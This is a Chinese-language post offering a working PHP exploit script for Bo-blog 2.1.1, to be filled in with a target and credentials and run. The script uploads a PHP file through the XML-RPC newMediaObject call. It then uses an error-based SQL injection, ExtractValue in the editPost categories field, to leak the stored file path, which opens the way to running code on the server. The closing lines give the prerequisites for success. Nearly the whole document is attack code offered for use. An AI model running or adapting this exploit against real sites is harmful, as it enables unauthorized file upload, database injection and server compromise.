Bo-blog 2.1.1 上传利用工具
利用代码如下（填好 $host/$path/$user/$pass/$code 后直接运行：脚本先用 metaWeblog.newMediaObject 上传文件，再用 metaWeblog.editPost 中的报错注入读出该文件在服务器上的存储路径）:
<?php
/* thx Mr_xhming */
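$host  = 'localhost';     // target hostname; also sent in the Host: and Referer: headers
$path  = 'bo-blog';       // install directory, no slashes -> POST /bo-blog/xmlrpc.php
$user  = 'admin';         // account must be usergroup >= 2 (per the original author's note)
$pass  = 'admin';
$code  = '<?phpinfo()?>'; // file body that gets uploaded
                          // NOTE(review): there is no whitespace after "<?php", so this only runs
                          // via the short "<?" open tag - confirm short_open_tag is on at the target.
$fname = 'wolvez.php';    // name the media object is stored under; the same name is looked up
                          // in boblog_upload.originalname by the second request

/* Nothing below needs editing; only the parameters above. */

// Step 1: metaWeblog.newMediaObject with the payload base64-encoded in "bits".
// NOTE(review): the original listing had line breaks inside this payload (one of them inside a
// closing tag), which looks like rendering wrap; they are dropped here - verify against a live target.
$cmd = '<?xml version="1.0" encoding="ISO-8859-1"?><methodName>metaWeblog.newMediaObject</methodName>'
     . '<value><int>0</int></value>'
     . '<value><string>' . $user . '</string></value>'
     . '<value><string>' . $pass . '</string></value>'
     . '<value><struct>'
     . '<name>name</name><struct-value><struct-string>' . $fname . '</struct-string></struct-value>'
     . '<name>bits</name><struct-value><struct-base64>' . base64_encode($code) . '</struct-base64></struct-value>'
     . '</struct></value>';
$uploadResp = send($cmd);
echo "ok\n"; // NOTE(review): printed unconditionally - the upload response is never inspected

// Step 2: metaWeblog.editPost. The "categories" value closes the SQL string and calls
// ExtractValue() with an invalid XPath built from the stored filepath, so the MySQL error
// message ("XPATH syntax error: '...'") echoes the path back. The same $user/$pass are used
// here (the original hard-coded admin/admin in this request, which broke for other accounts).
$att = '<?xml version="1.0" encoding="ISO-8859-1"?><methodName>metaWeblog.editPost</methodName>'
     . '<value><int>0</int></value>'
     . '<value><string>' . $user . '</string></value>'
     . '<value><string>' . $pass . '</string></value>'
     . '<value><struct>'
     . '<name>title</name><struct-value><struct-string>wolvez</struct-string></struct-value>'
     . '<name>pubDate</name><struct-value><struct-string>asd</struct-string></struct-value>'
     . '<name>description</name><struct-value><struct-string>asd</struct-string></struct-value>'
     . '<name>categories</name><struct-value><struct-string>'
     . 'x\' or ExtractValue(1,CONCAT(0x5c,(SELECT filepath FROM boblog_upload where originalname=0x'
     . bin2hex($fname) . ' limit 1)))#'
     . '</struct-string></struct-value>'
     . '</struct></value>';
$injResp = send($att);

// Pull the leaked value out of the error text. When there is no match the raw response is
// shown instead of being silently printed as if it were a path.
if (!preg_match('/(.*)XPATH syntax error: \'(.+?)\'(.*)/s', $injResp, $m)) {
    exit("no XPATH error in response (ExtractValue needs MySQL >= 5.1); raw response follows:\n" . $injResp . "\n");
}
// NOTE(review): the original appended "php" to the leaked value, presumably because the error
// text truncates the extension - verify against the actual error message before relying on it.
exit("{$m[2]}php\n");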
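/**
 * POST a raw body to /{$path}/xmlrpc.php on $host and return the complete HTTP response
 * (status line, headers and body) as one string.
 *
 * Reads $host and $path from the global scope as the original did. An optional global $port
 * (default 80) selects the TCP port. On connection failure the error is logged and '' is
 * returned, instead of writing to a false socket handle; the socket is always closed.
 *
 * @param string $cmd request body, sent verbatim (Content-Length is its byte length)
 * @return string     raw response, or '' when the connection could not be opened
 */
function send($cmd)
{
    global $host, $path;
    $port = isset($GLOBALS['port']) ? (int) $GLOBALS['port'] : 80;

    $headers = array(
        "POST /{$path}/xmlrpc.php HTTP/1.1",
        'Accept: */*',
        'Referer: ' . $host,
        'Content-Type: text/k4shifz',       // arbitrary type, kept from the original
        'User-Agent: Mozilla/4.0 IE',
        'Host: ' . $host,
        'Content-Length: ' . strlen($cmd),  // strlen is byte-wise, which is what the header needs
        'Connection: Close',
    );
    $message = implode("\r\n", $headers) . "\r\n\r\n" . $cmd;

    $errno  = 0;
    $errstr = '';
    $fp = fsockopen($host, $port, $errno, $errstr, 10);
    if (!$fp) {
        error_log("connect to {$host}:{$port} failed: {$errstr} ({$errno})");
        return '';
    }

    fwrite($fp, $message);
    $resp = '';
    while (!feof($fp)) {
        $chunk = fread($fp, 1024);
        if ($chunk === false) {
            break;
        }
        $resp .= $chunk;
    }
    fclose($fp);
    return $resp;
}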
?>
需要管理员权限：所用账号的 usergroup 需 ≥ 2（见代码中 $user 旁的注释），newMediaObject 与 editPost 两次调用都以该账号认证。
上传这一步一定能成功；后面的注射读取路径则不一定有结果，因为它依赖 ExtractValue() 的报错回显，而该函数需要 MySQL ≥ 5.1。
BY:狼族